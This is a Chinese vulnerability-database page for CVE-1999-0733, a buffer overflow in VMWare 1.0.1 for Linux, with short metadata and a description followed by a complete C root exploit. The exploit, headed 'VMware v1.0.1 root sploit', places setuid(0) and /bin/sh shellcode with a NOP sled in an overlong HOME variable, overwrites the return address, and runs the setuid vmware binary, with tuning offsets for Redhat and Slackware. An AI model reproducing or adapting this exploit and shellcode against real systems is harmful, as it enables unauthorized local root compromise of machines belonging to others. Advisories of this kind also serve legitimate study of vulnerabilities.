Linux VMWare缓冲区溢出漏洞

QQ空间 新浪微博 微信 QQ facebook twitter
漏洞ID 1105481 漏洞类型 缓冲区溢出
发布时间 1999-06-25 更新时间 2005-05-02
CVE编号 CVE-1999-0733 CNNVD-ID CNNVD-199906-029
漏洞平台 Linux CVSS评分 7.2
|漏洞来源
https://www.exploit-db.com/exploits/19371
http://www.cnnvd.org.cn/web/xxk/ldxqById.tag?CNNVD=CNNVD-199906-029
|漏洞详情
Linux的VMWare1.0.1版本存在缓冲区溢出漏洞。可以借助一个长的HOME环境变量导致该漏洞。
|漏洞EXP
source: http://www.securityfocus.com/bid/490/info


VMWare is virtual machine software produced by VMWare inc. VMWare version 1.0.1 for Linux is vulnerable to a buffer overflow attack. Since VMWare is installed with binaries that are setuid root, local users can exploit the hole allowing for arbitrary code to be executed as root. The consequences are a local root compromise. 

/* 
 * VMware v1.0.1 root sploit
 * funkySh 02/07/99
 * 
 * 1. Redhat 5.2     2.2.9 offset 800-1100
 * 2.                      offset 1600-2200
 * 1. Slackware 3.6  2.2.9 offset 0
 * 2.                      offset ?       
 *
 * [ 1 - started from xterm on localhost ]
 * [ 2 - started from telnet, with valid display ]
 */


#include <stdio.h> 

char code[] = "\x31\xdb\x89\xd8\xb0\x17\xcd\x80" /*setuid(0) */
              "\xeb\x1f\x5e\x89\x76\x08\x31\xc0\x88\x46\x07\x89\x46\x0c"
              "\xb0\x0b\x89\xf3\x8d\x4e\x08\x8d\x56\x0c\xcd\x80\x31\xdb"
              "\x89\xd8\x40\xcd\x80\xe8\xdc\xff\xff\xff/bin/sh";

#define BUFFER 1032
#define NOP 0x90 
#define RET_ADDR 0xbfffdf50
#define PATH "/usr/local/bin/vmware"

char buf[BUFFER];

void main(int argc, char * argv[])
{
  int i, offset = 0;
  if(argc > 1) offset = atoi(argv[1]);

 memset(buf,NOP,BUFFER);
 memcpy(buf+800,code,strlen(code));
 for(i=854+2;i<BUFFER-2;i+=4)
   *(int *)&buf[i]=RET_ADDR+offset;

  setenv("HOME", buf, 1);
  execl(PATH,"vmware","-display","127.0.0.1:0",0);
  /* change IP if required */
}
|参考资料

来源:BID
名称:490
链接:http://www.securityfocus.com/bid/490